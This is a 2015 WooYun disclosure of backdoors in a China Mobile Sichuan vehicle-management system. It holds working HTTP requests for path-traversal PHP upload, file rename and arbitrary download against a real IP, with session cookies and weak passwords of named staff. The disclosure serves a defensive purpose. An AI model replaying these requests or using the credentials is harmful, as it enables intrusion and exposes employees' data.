当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119898

漏洞标题:中国移动某通用系统两个后门/可任意上传/下载/打包数据库/调试代码

相关厂商:中国移动

漏洞作者: xxlegend

提交时间:2015-06-15 10:04

修复时间:2015-09-17 17:30

公开时间:2015-09-17 17:30

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-15: 细节已通知厂商并且等待厂商处理中
2015-06-19: 厂商已经确认,细节仅向厂商公开
2015-06-22: 细节向第三方安全合作伙伴开放
2015-08-13: 细节向核心白帽子及相关领域专家公开
2015-08-23: 细节向普通白帽子公开
2015-09-02: 细节向实习白帽子公开
2015-09-17: 细节向公众公开

简要描述:

中国移动某通用车辆管理系统系统两个后门,可任意上传,下载,打包数据库,调试代码,可导出几万移动员工信息,还附带各种弱口令

详细说明:

四川移动车辆管理平台统一入口,涉及到几十个分公司,几十个站点
http://www.zh-beidou.com/sichuanyidongchelianganquanguanlixitongrukou/
拿巴中分公司做实验,http://117.172.133.2
后门1:数据备份接口,在这个接口可下载任意文件,上传,重命名任意文件

yidong-houme1.png


POST http://117.172.133.2/cgi-bin/upload.asp?destPath=upload/database_backup/&autoUnzip=unzip_delete HTTP/1.1
Host: 117.172.133.2
Proxy-Connection: keep-alive
Content-Length: 258
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://117.172.133.2
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWWf2B3XWh3UuaYWZ
Referer: http://117.172.133.2/html/admin/databaseBackup.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: JSESSIONID=C47295A7C9BCC356873671A8CF54DE4D; __TIAS_SESSIONID__=c55e8b9c588e468a8959bb68aa76c9d0; tidyinfo.language=%22cn%22; tias_onlineid=23837; tias_online_account=admin; tias_online_username=\u7ba1\u7406\u5458; tias_online_uid=1; tidyinfo.username=%22admin%22; tidyinfo.project=%22cgi-bin%22; tidyinfo.projectName=%22%u9996%u9875%22; tidyinfo.appBaseURL=%22/cgi-bin/%22
------WebKitFormBoundaryWWf2B3XWh3UuaYWZ
Content-Disposition: form-data; name="file"; filename="../../ckfinder/core/connector/php/php4/Core/get.php"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
------WebKitFormBoundaryWWf2B3XWh3UuaYWZ—


yidong-上传.png


重命名:

POST http://117.172.133.2/cgi-bin/submit.asp HTTP/1.1
Host: 117.172.133.2
Proxy-Connection: keep-alive
Content-Length: 140
Origin: http://117.172.133.2
X-Requested-With: Ext.basex
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://117.172.133.2/html/admin/databaseBackup.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: JSESSIONID=646301839280971C6BEABDFBF87203E6; __TIAS_SESSIONID__=c55e8b9c588e468a8959bb68aa76c9d0; tidyinfo.language=%22cn%22; tias_onlineid=23837; tias_online_account=admin; tias_online_username=\u7ba1\u7406\u5458; tias_online_uid=1; tidyinfo.username=%22admin%22; tidyinfo.project=%22cgi-bin%22; tidyinfo.projectName=%22%u9996%u9875%22; tidyinfo.appBaseURL=%22/cgi-bin/%22
module=pd_database_backup&action=rename&filename=201506100392.php&newfilename=../../ckfinder/core/connector/php/php4/Core/get.php&projectId=
HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Date: Wed, 10 Jun 2015 14:39:14 GMT
Server: XiaoYun.Smart.Router
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
Content-Length: 26
{"success":true,"emsg":""}


下载:

GET http://117.172.133.2/cgi-bin/submit.asp?module=pd_database_backup&action=download&file=../..//ckfinder/core/connector/php/php4/Core/get.php&projectId= HTTP/1.1
Host: 117.172.133.2
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Referer: http://117.172.133.2/html/admin/databaseBackup.html
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: JSESSIONID=646301839280971C6BEABDFBF87203E6; __TIAS_SESSIONID__=c55e8b9c588e468a8959bb68aa76c9d0; tidyinfo.language=%22cn%22; tias_onlineid=23837; tias_online_account=admin; tias_online_username=\u7ba1\u7406\u5458; tias_online_uid=1; tidyinfo.username=%22admin%22; tidyinfo.project=%22cgi-bin%22; tidyinfo.projectName=%22%u9996%u9875%22; tidyinfo.appBaseURL=%22/cgi-bin/%22


yidong-xiaz.png


2,另一个后门,可调试服务器上代码:
http://117.172.133.2/cgi-bin/debug.html
3,附带弱口令
弱口令:
admin:1 内置无法删除,修改
配置员:111111
张俊芳:111222
张良彬:222222 一大批人使用
申请个闪电吧

漏洞证明:

修复方案:

把这些后门都关了,移动公司的人都不知道有这些后门,哎

版权声明:转载请注明来源 xxlegend@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-19 17:28

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向四川移动通报,由其后续协调网站管理部门处置。

最新状态:

暂无